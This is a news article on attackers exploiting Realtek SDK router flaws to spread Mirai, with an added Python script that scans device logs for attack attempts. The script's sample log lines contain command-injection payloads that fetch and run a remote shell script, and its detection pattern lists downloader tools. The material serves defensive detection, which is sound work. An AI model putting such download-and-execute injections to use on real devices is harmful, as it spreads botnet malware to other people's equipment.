Researchers at cybersecurity company SAM are warning that attackers are attempting to exploit a recent set of dangerous vulnerabilities in the Realtek SDK that came to light earlier this month.
Tracked as CVE-2021-35392, CVE-2021-35393, CVE-2021-35394 and CVE-2021-35395, the critical flaws reside in Realtek chipsets used in hundreds of thousands of smart devices from at least 65 vendors, including Asus, Belkin, D-Link, Netgear, Tenda, ZTE, and Zyxel, to name a few. The affected devices range from residential gateways and travel routers to Wi-Fi repeaters, IP cameras, smart lighting gateways and connected toys, according to security firm IoT Inspector, which first disclosed the flaws.
By exploiting the above vulnerabilities, a remote, unauthenticated attacker can fully compromise a target device and execute arbitrary code with the highest level of privilege.
Just days after the details of the vulnerabilities were made public, SAM researchers noticed that one of the flaws (CVE-2021-35395) was being exploited in the wild to spread a Mirai variant, the same variant spotted in March by Palo Alto Networks.
“Specifically, we noticed exploit attempts to ‘formWsc’ and ‘formSysCmd’ web pages. The exploit attempts to deploy a Mirai variant detected in March by Palo Alto Networks,” the researchers said.
“A similar incident was reported two weeks ago, on August 6th, by Juniper Networks [5]. A newly discovered vulnerability was then exploited in the wild only 2 days after publication to spread the same Mirai variant… The webserver serving the Mirai botnet uses the same network subnet, indicating that the same attacker is involved in both incidents.”
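For defenders who want to check their own device or gateway logs for the activity SAM describes, the following is an added example written for this page; it is not code from SAM, Palo Alto Networks or the original article. It scans constructed web-server log lines for requests to the two endpoint names named above and flags request bodies that carry shell command-injection markers. The log format, the `/boafrm/` path prefix, the parameter names in the sample lines and the IP addresses (documentation ranges) are all assumptions made for the example, not details taken from the page.

```python
import re
from dataclasses import dataclass
from typing import List
from urllib.parse import unquote_plus

# Endpoint names the SAM write-up reports exploit attempts against.
# Matching is done on the last path component only, so the "/boafrm/"
# prefix used in the sample lines (an assumption) does not matter.
TARGET_ENDPOINTS = {"formWsc", "formSysCmd"}

# Heuristic for shell command injection in a decoded request payload:
# command separators / substitution, or common downloader and exec binaries.
SHELL_META = re.compile(
    r"[;|`]|\$\(|&&|\b(?:wget|curl|tftp|busybox|chmod|sh)\b"
)

# Constructed log format (assumed, not the device's real format):
#   <client ip> [<timestamp>] <METHOD> <path> ["<raw request body>"]
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] (?P<method>[A-Z]+) (?P<path>\S+)'
    r'(?: "(?P<body>[^"]*)")?\s*$'
)


@dataclass
class Hit:
    ip: str
    ts: str
    endpoint: str
    injection_markers: bool   # True when SHELL_META matched the payload
    decoded_body: str


def endpoint_of(path: str) -> str:
    """Return the last path component, ignoring any query string and trailing slash."""
    return path.split("?", 1)[0].rstrip("/").rsplit("/", 1)[-1]


def scan_log(lines: List[str]) -> List[Hit]:
    """Return one Hit per request to a targeted endpoint, in log order."""
    hits: List[Hit] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # line does not fit the constructed format; skip it
        endpoint = endpoint_of(m["path"])
        if endpoint not in TARGET_ENDPOINTS:
            continue
        # URL-decode once so "%3B" and "+" cannot hide metacharacters.
        body = unquote_plus(m["body"] or "")
        query = unquote_plus(m["path"].partition("?")[2])
        payload = body + " " + query
        hits.append(Hit(
            ip=m["ip"],
            ts=m["ts"],
            endpoint=endpoint,
            injection_markers=bool(SHELL_META.search(payload)),
            decoded_body=body,
        ))
    return hits


# Constructed sample lines. 198.51.100.0/24 and 203.0.113.0/24 are
# documentation address ranges; the parameter names are placeholders.
SAMPLE_LOG = [
    '192.168.1.10 [2021-08-18T09:12:01Z] GET /index.htm',
    '192.168.1.10 [2021-08-18T09:12:05Z] POST /boafrm/formLogin "username=admin"',
    '198.51.100.7 [2021-08-18T09:13:44Z] POST /boafrm/formWsc '
    '"peerPin=12345678%3Bwget+http%3A%2F%2F203.0.113.5%2Fbin.sh%3Bsh+bin.sh"',
    '198.51.100.7 [2021-08-18T09:13:45Z] POST /boafrm/formSysCmd '
    '"sysCmd=cd+%2Ftmp%3B+chmod+%2Bx+bin.sh"',
    '192.168.1.10 [2021-08-18T09:20:00Z] POST /boafrm/formWsc "peerPin=87654321"',
]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        level = "HIGH" if hit.injection_markers else "INFO"
        print(f"{level:4} {hit.ts} {hit.ip} -> {hit.endpoint}: {hit.decoded_body}")
```

Any request that reaches formSysCmd from outside the LAN deserves a look regardless of its payload, since the endpoint exists to run system commands; the `injection_markers` flag mainly helps separate a legitimate WPS PIN submission to formWsc from an attempt to chain a download-and-execute onto it. Tune `SHELL_META` to your environment, and treat a hit as a prompt to pull the device's firmware version and the SAM IOCs rather than as proof of compromise.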
The SAM research team said that based on their own analysis, the most common device models currently running the vulnerable Realtek SDK include the following:
Netis E1+ extender
Edimax N150 and N300 Wi-Fi router
Repotec RP-WR5444 router
The researchers provided full attack details, as well as Indicators of Compromise (IOCs) in their blog post.